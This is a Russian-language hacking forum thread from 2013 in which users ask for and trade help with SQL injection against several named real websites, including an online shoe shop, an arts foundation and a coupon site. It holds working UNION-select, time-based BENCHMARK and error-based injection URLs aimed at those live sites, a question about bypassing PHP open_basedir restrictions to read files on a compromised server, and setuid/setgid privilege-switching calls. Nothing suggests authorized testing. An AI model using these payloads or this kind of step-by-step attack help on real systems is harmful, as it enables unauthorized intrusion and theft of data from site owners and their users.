Старый 27.01.2013, 23:21   #2681
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
euro
я делал так, работало:
setuid(539);
setgid(539);
seteuid(539);
setegid(539);
setreuid(539,539);
setregid(539,539);
спасибо, работает.
euro вне форума   Ответить с цитированием
Старый 30.01.2013, 22:46   #2682
dx0day
 
Регистрация: 25.10.2012
Сообщений: 5
Репутация: -2
По умолчанию

Помогите провести sql inj на сайте.
Почему-то когда я вывожу информацию с помощью information_schema все идет гуд.
http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,group_concat(column_name),5, 6,7,8,9,10,11+from+information_schema.columns+wher e+table_name=CHAR(80,%2082,%2079,%2070,%2073,%2076 ,%2073,%2078,%2071)--
Имя таблицы PROFILING

А вот когда пытаюсь вывести все сладкое ничего не выходит
http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,QUERY_ID,5,6,7,8,9,10,11+fro m+PROFILING--
Прошу помощи так как сам еще новечёк, буду очень благодарен за любые замечания и ответы! Спасибо!
dx0day вне форума   Ответить с цитированием
Старый 30.01.2013, 23:14   #2683
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от dx0day Посмотреть сообщение
Помогите провести sql inj на сайте.
Почему-то когда я вывожу информацию с помощью information_schema все идет гуд.
http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,group_concat(column_name),5, 6,7,8,9,10,11+from+information_schema.columns+wher e+table_name=CHAR(80,%2082,%2079,%2070,%2073,%2076 ,%2073,%2078,%2071)--
Имя таблицы PROFILING

А вот когда пытаюсь вывести все сладкое ничего не выходит
http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,QUERY_ID,5,6,7,8,9,10,11+fro m+PROFILING--
Прошу помощи так как сам еще новечёк, буду очень благодарен за любые замечания и ответы! Спасибо!
так, что ли? Таблица пустая.

http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,count(*),5,6,7,8,9,10,11+fro m+information_schema.PROFILING+--+
Flakt вне форума   Ответить с цитированием
Старый 31.01.2013, 10:37   #2684
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
http://www.kunststiftungnrw.de/inhalt.php?id=7
подсобите, как составить запрос?
Всё печально =(

4 ветка мускула. Я пока только способ с Time-Based применил.

_http://www.kunststiftungnrw.de/inhalt.php?id=7+and+if(1=1,BENCHMARK(1000000,MD5(0 x3a)),0)+--+ TRUE

_http://www.kunststiftungnrw.de/inhalt.php?id=7+and+if(2=1,BENCHMARK(1000000,MD5(0 x3a)),0)+--+ FALSE

_http://www.kunststiftungnrw.de/inhalt.php?id=7+and+if(substring((@@version),1,1)= 4,BENCHMARK(1000000,MD5(0x3a)),0)+--+ TRUE

_http://www.kunststiftungnrw.de/inhalt.php?id=7+and+if(substring((@@version),1,1)= 5,BENCHMARK(1000000,MD5(0x3a)),0)+--+ FALSE

Так как версия Мускула 4.0* то вариант с rand() и error-based вроде бы отпадает.

Последний раз редактировалось BigBear; 31.01.2013 в 10:40..
BigBear вне форума   Ответить с цитированием
Старый 31.01.2013, 10:40   #2685
dx0day
 
Регистрация: 25.10.2012
Сообщений: 5
Репутация: -2
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
так, что ли? Таблица пустая.

http://www.triumf-obuv.ru/man.php?id=-20+union+select+1,2,3,count(*),5,6,7,8,9,10,11+fro m+information_schema.PROFILING+--+
Спасибо за ответ, вы абсолютно правы.
У меня ещё один вопрос. Уже не первый раз встречаю сайт с подобной архитектурой базы данных,
не могу понять что это за двиг, проверял через _http://2ip.ru/cms/
Так вот в чем беда, так как будто нет таблицы с пользователями. Такое бывает?
Выражаю огромную благодарность за помощь.
dx0day вне форума   Ответить с цитированием
Старый 31.01.2013, 10:43   #2686
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Цитата:
Сообщение от dx0day Посмотреть сообщение
Спасибо за ответ, вы абсолютно правы.
У меня ещё один вопрос. Уже не первый раз встречаю сайт с подобной архитектурой базы данных,
не могу понять что это за двиг, проверял через _http://2ip.ru/cms/
Так вот в чем беда, так как будто нет таблицы с пользователями. Такое бывает?
Выражаю огромную благодарность за помощь.
Всякое бывает. Бывает что таблицы нет, бывает есть таблица, но неизвестен префикс к ней, а information_schema не доступна или отсутствует. А бывает, что и таблица лежит не в БД , а вообще в файле =)
BigBear вне форума   Ответить с цитированием
Старый 31.01.2013, 15:01   #2687
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Цитата:
Сообщение от BigBear Посмотреть сообщение
А бывает, что и таблица лежит не в БД , а вообще в файле =)
На днях обнаружил файл базы лежал в /etc/berkeley да еще и права 644)
b3 вне форума   Ответить с цитированием
Старый 31.01.2013, 23:24   #2688
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Здравствуйте друзья. Давно не посещал, снова накопилось несколько сайтов, в раскрутке которых требуется ваша помощь.
1) http://forum911.ru/category/dengi'
SQL судя по всему в одном запросе, а попадает во второй, который кстати выводится на экран, раскрутить не получается никак, знаний не хватает.
2) http://www.ladykupon.ru/page/oferta'
Ещё одна, совсем не понятная, не получается сделать вывод в ошибку, так же не получается сделать вывод на экран, возиться как со слепой не особо хочется, если что то можно сделать так же буду очень благодарен.

Спасибо за внимание.
Сергей Бардюр вне форума   Ответить с цитированием
Старый 01.02.2013, 00:22   #2689
maky
 
Регистрация: 03.04.2012
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
http://www.ladykupon.ru/page/oferta'
можно так сделать вывод :
_ttp://www.ladykupon.ru/page/oferta' and (SELECT 1 from(SELECT count(*),CONCAT(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'oferta'='oferta
maky вне форума   Ответить с цитированием
Старый 01.02.2013, 10:08   #2690
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Есть ли возможность обойти ограничение open_basedir и прочитать файлы?
Linux 3.3.4-gentoo
php 5.3.20
Запрещены функции: exec, dl, passthru, pcntl_exec, popen, proc_open, shell_exec, symlink, system
В mysql нет прав на чтение файлов.

Нашел только способ, как список файлов перебрать. Но это не интересно и в логах куча мусора от брута.
zuzzz вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot